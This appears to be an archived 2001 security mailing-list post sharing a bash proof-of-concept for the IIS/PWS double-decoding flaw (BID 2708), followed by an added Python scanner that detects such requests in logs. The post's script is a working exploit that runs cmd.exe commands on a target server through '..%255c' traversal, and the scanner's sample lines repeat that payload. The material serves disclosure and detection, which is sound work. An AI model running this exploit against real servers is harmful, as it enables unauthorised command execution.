OSEC

From: Sam Wilson (swilsonnumbsafari.com)
Date: Tue Jul 24 2001 - 14:54:04 CDT

    I'm not sure if you remember this exploit from back in May, but essentially,
    using a UNIX box you can obtain a remote console on an affected Win2K box.
    Without reading the script again or spending too many brain cycles on
    remembering the details I believe the exploit does *NOT* require having
    RConsole or Terminal services installed on the victim.

    The exploit has Bugtraq ID 2708 and is titled "MS IIS/PWS Escaped Characters
    Decoding Command Execution Vulnerability". A gentleman by the name of Leif
    Jakob <bugtraqjakob.weite-welt.com> has provided the 'IIS_escape_test.sh'
    exploit. I've pasted my copy of the script below my sig.

    We never experienced this attack in the wild, however we did use the exploit
    in a test environment to confirm it. It works. Rather nicely, actually.

    Hope that helps.

    Sam Wilson
    Software Engineer
    swilsonecount.com

    ---------------------
    #!/bin/bash

    # Copyright 2001 by Leif Jakob <bugtraqjakob.weite-welt.com>
    #
    # do not abuse this code... blah blah :)

    if [ -z "$1" ] ; then
        echo "usage:"
        echo "$0 hostname"
        exit 1
    fi

    host="$1"

    # locate a netcat binary under either of its usual names
    NETCAT=$(which netcat)

    if [ -z "$NETCAT" ] ; then
        NETCAT=$(which nc)
    fi

    if [ -z "$NETCAT" -o ! -x "$NETCAT" ] ; then
        echo "you need netcat to make this work"
        exit 1
    fi

    echo "using netcat:$NETCAT"

    # print one HTTP/1.0 request on stdout: $count copies of '..%255c' (a
    # double-encoded '..\') in front of cmd.exe, then the command to run
    function makeRequest
    {
        host="$1"
        count=$2
        cmd="$3"
        echo -n 'GET /scripts/'
        while [ "$count" -gt 0 ] ; do
            echo -n '..%255c'
            count=$((count-1))
        done
        echo -n 'winnt/system32/cmd.exe?/c+'
        echo -n "$cmd"
        echo ' HTTP/1.0'
        echo "Host: $host"
        echo ''
        echo 'dummy'
    }

    function testHost
    {
        host="$1"
        count=10 # you can't overdo it
        cmd='dir+c:\'
        # pipe the request into the netcat binary located above, 4 s timeout
        makeRequest "$host" "$count" "$cmd" | "$NETCAT" -w 4 "$host" 80
    }

    testHost "$host"
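
The request the script above sends only becomes a traversal after the server decodes the path a second time (`..%255c` becomes `..%5c`, then `..\`). A defender reviewing web logs or building a filter therefore has to apply the same second decode before checking the path. The following Python is an added example written for this page; it is not part of Sam Wilson's post or Leif Jakob's script. It reads raw HTTP request lines (the sample lines are constructed for the example), URL-decodes the path repeatedly, and reports after how many decoding passes the path first climbs above the web root, so a hit on pass 2 is exactly the double-decoding pattern from BID 2708. The function and constant names are the example's own.

```python
"""Detect request paths that traverse the web root only after a second
URL-decoding pass (the IIS/PWS escaped-character decoding bug, BID 2708)."""
from urllib.parse import unquote

# How many decoding rounds to check. Two is enough for the ..%255c pattern.
MAX_DECODE_PASSES = 2

# Constructed sample request lines for the example, not real log data.
SAMPLE_REQUESTS = [
    # double-encoded backslashes: harmless after one decode, traversal after two
    "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0",
    # single-encoded backslashes: traversal visible after one decode
    "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe HTTP/1.0",
    # '..' that stays inside the web root
    "GET /docs/a/../b.htm HTTP/1.0",
    # double-encoded data in the query string only; the path is clean
    "GET /scripts/index.asp?id=%2525 HTTP/1.0",
    "GET /images/logo.gif HTTP/1.0",
]


def request_path(request_line):
    """Return the path component of an HTTP request line, without the query."""
    parts = request_line.split()
    if len(parts) < 2:
        return ""
    return parts[1].split("?", 1)[0]


def escapes_root(path):
    """True if a decoded path climbs above the web root.

    IIS accepts backslash as a separator, so both separators are normalised
    before walking the segments and tracking directory depth."""
    depth = 0
    for segment in path.replace("\\", "/").split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment not in ("", "."):
            depth += 1
    return False


def traversal_decode_pass(request_line, max_passes=MAX_DECODE_PASSES):
    """Number of URL-decoding passes after which the path escapes the root.

    0: never within max_passes (clean request)
    1: ordinary traversal, visible after a single decode
    2: traversal that only appears after a second decode (BID 2708 pattern)
    """
    path = request_path(request_line)
    for passes in range(1, max_passes + 1):
        path = unquote(path)
        if escapes_root(path):
            return passes
    return 0


def scan(lines):
    """Return (request_line, passes) for every line that traverses the root."""
    flagged = []
    for line in lines:
        passes = traversal_decode_pass(line)
        if passes:
            flagged.append((line, passes))
    return flagged


if __name__ == "__main__":
    for line, passes in scan(SAMPLE_REQUESTS):
        label = "double-decode traversal" if passes == 2 else "traversal"
        print(f"pass {passes} ({label}): {line}")
```

A server-side filter built on this check should reject a request as soon as any pass escapes the root; a log review that wants to separate the double-decoding attempts from ordinary `../` probes can key on the pass number.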